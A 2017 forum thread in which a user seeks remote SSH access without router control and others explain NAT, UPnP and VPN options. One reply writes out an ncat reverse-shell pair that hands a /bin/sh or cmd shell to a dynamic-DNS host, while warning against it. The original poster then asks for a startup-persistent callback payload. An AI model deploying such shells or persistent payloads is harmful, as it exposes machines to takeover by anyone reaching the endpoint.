karencho Posted July 20, 2017 Share Posted July 20, 2017 Hello i am using Windows 7 and i need to portforward several ports,but dont have no access to router username and password,so is there methods to do it without router,i have tried miniupnp it is not working giving me an errors ,so is there possibility to do it without router or miniupnp? Quote Link to comment Share on other sites More sharing options...
Rkiver Posted July 20, 2017 Share Posted July 20, 2017 https://www.google.ie/search?q=Port+forwarding+without+router+access&oq=Port+forwarding+without+router+access&aqs=chrome..69i57j0l5.4915j0j7&sourceid=chrome&ie=UTF-8 Seems like google can help, even a video setup that shows it without any programs. Though depending who is controlling your network, they may not be thrilled with you bypassing whatever setup they have. Quote Link to comment Share on other sites More sharing options...
karencho Posted July 20, 2017 Author Share Posted July 20, 2017 non of that was working i tyed many things((( ,but how skype,or utorrent is working,so they have access to portforward without router Quote Link to comment Share on other sites More sharing options...
digip Posted July 20, 2017 Share Posted July 20, 2017 (edited) Skype uses Microsoft's servers, that you connect to and initiate the back channel the traffic goes over,no port forwarding needed. uTorrent pretty much same thing in calling out bound, but on older systems like XP, might require port forwarding to make it work but shouldn't be an issue. The torrent file takes care of the routing and addresses and at most you should only have to unblock it on your firewall. Other apps, or programs that sit for a service like an apache server, need to have port 80 or 443 forwarded to see the web server. This is because your machine is the host of the service, as where skype, Microsoft is the host of the service all your traffic runs through. Signing into skype, opens this connection, as where in example you have Apache on the home machine, an end users initiates the connection to you and has to get past NAT on your router to see the intended box behind your router on the LAN, which is why port forwarding is needed to tell which machine to route to. Edited July 20, 2017 by digip Quote Link to comment Share on other sites More sharing options...
karencho Posted July 20, 2017 Author Share Posted July 20, 2017 so there is no way to portforward without access ,i guess that router has disable upnp function thats why i cant portforward with miniupnp Quote Link to comment Share on other sites More sharing options...
digip Posted July 20, 2017 Share Posted July 20, 2017 (edited) Quote so there is no way to portforward without access ,i guess that router has disable upnp function thats why i cant portforward with miniupnp If upnp is disabled on the gateway(which it should be for security reasons) then no you can't use upnp to open the ports on the router. You'd need access to the router to look and see if that is the case, but port forwarding even without upnp will work, just have to do it manually from the router. Some routers may not even accept upnp settings by default and not have that functionality. If it's on the local lan, you can use your box as a NAT point and forward to other machines on another lan segment or 2nd subnet you're the gateway for(example: if you have two network cards in 2 different subnets you are attached to, like a home only dev network that has no internet access at all without routing through your machine), but if you want something form the Internet to reach your machine then the main gateway at the edge of the network has to forward to you for someone from "outside" to reach you. Local machine Port forwarding is at times normally used when doing attacks on boxes from the same network or MITM, Fake AP attacks, etc. Unless you're acting as a gateway for another machine, port fowarding on your machine alone doesn't do much. Where are you forwarding it to? For what purpose? Is your box in a DMZ? If it ism then your machine would accept all requests from the internet side, and you could then, port forward from your machine, but the whole point of that Gateway at the edge of the network, is to keep machines like yours from being accessible by any drive by attacks and by default, hiding you and dropping unsolicited traffic. Port forwarding on the gateway helps to allow services, such as a web server on one of the LAN machines, be reachable from the internet. Edited July 20, 2017 by digip Quote Link to comment Share on other sites More sharing options...
karencho Posted July 21, 2017 Author Share Posted July 21, 2017 i need portforwarding for SSH access on wan,i dont want to use software like Teamviewer ......... SSh is perfect tool but i cant portforward so i can reach it in WAN,and thats it?i cant do anythig if i dont know password to my router? i have a DSL connection by the way Quote Link to comment Share on other sites More sharing options...
barry99705 Posted July 21, 2017 Share Posted July 21, 2017 If you can't do the forwarding on the router, then ssh isn't the perfect tool. The connection doesn't matter, dsl, cable, fiber, microwave, string and dixie cups, if you don't control the router, you're not going to be port forwarding. Quote Link to comment Share on other sites More sharing options...
cacizupin Posted July 21, 2017 Share Posted July 21, 2017 @barry99705 what about tor? Can we use that to use metasploit on? Quote Link to comment Share on other sites More sharing options...
digip Posted July 21, 2017 Share Posted July 21, 2017 10 hours ago, karencho said: i need portforwarding for SSH access on wan,i dont want to use software like Teamviewer ......... SSh is perfect tool but i cant portforward so i can reach it in WAN,and thats it?i cant do anythig if i dont know password to my router? i have a DSL connection by the way Hmm. I'll throw out a couple of ways you could get around this, but only one of them is really safe. Reverse shells(which anyone listening for could take over the system) and VPN. You could in theory use SSH with a bounce and have the system initiate the call to you, but whatever device you want to connect to the home network, would need an address on the internet in front of NAT at the other end as well. You'd have to use something like DynDNS on the external box and setup a service on the internal machine to always dial out to the DynDNS address and port for your externally used device, and then listen for the call, in a sense. Not sure SSH could be used, but "ncat" that comes with nmap, can do SSL with the switch --ssl when connecting to another system. All you have to do, is setup a listener with "ncat --ssl -lvp 443" and on the home box do "ncat --ssl -v somedydndns.address.com 443 -e /bin/sh" or if on windows "-e cmd". The home machine would need to be scripted to continually try this every few minutes to dial to you, and once connected, keep the connection alive, and when dies, restart the calling home to your DynDNS address. This lets you move around anywhere, so long as you're using the DynDNS address on your remote device in some manner, and it will always call you. --- That said --- I advise you NOT to do this. Reason being, this machine is returning a shell to the intended DynDNS address, but if someone else gets this address somehow, they could potentially be getting your shell as well. They would get your system's shell handed to them, but I wanted to show that it could be done to bypass NAT and the gateway without port fowarding. You could probably setup your own script to handle authentication in some other manner than blatantly handing over a full shell, but not sure how you go about scripting that side of it, but sure it can be done, and there are probably scripts or tools that already do this, but I don't know what they are. The last thing, is a VPN. Most VPN protocols, are allowed on routers by default, ie: no port forwarding needed I believe for certain ports. I think port 500 and another one I can't remember off the top of my head, work for VPN passthrough by default on nearly all home routers, unless explicitly denied/disabled. A VPN would also be the safest way to do this and allow you to not just SSH into the home network, but if configured properly, safely tunnel all your traffic when on the road through your home connection, safeguarding your data when at say a free wifi cafe, your traffic would be encrypted if on a VPN. an HTTP socks proxy, will only safeguard the browser or programs configured for one, where as a VPN, tunnels all traffic over the VPN. Quote Link to comment Share on other sites More sharing options...
karencho Posted July 21, 2017 Author Share Posted July 21, 2017 found this http://seecreen.com/ teamviewer java version ,is there possible to use the same technology but have only to cmd access ,it will be practicly the same like ssh Quote Link to comment Share on other sites More sharing options...
karencho Posted July 22, 2017 Author Share Posted July 22, 2017 can yo tell me is there payload that connects to single ip adress (The Host) until Host accepts connection? so for example my ip address is 192.168.1.101 (HOST) and i create payload in python and run it on windows machine plus create service to run script evere time on windows start up,so is there possible to create payload that will install to windows machine so it will connect to ip adress 192.168.1.101 until the Host accepts connection there is no such payload? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.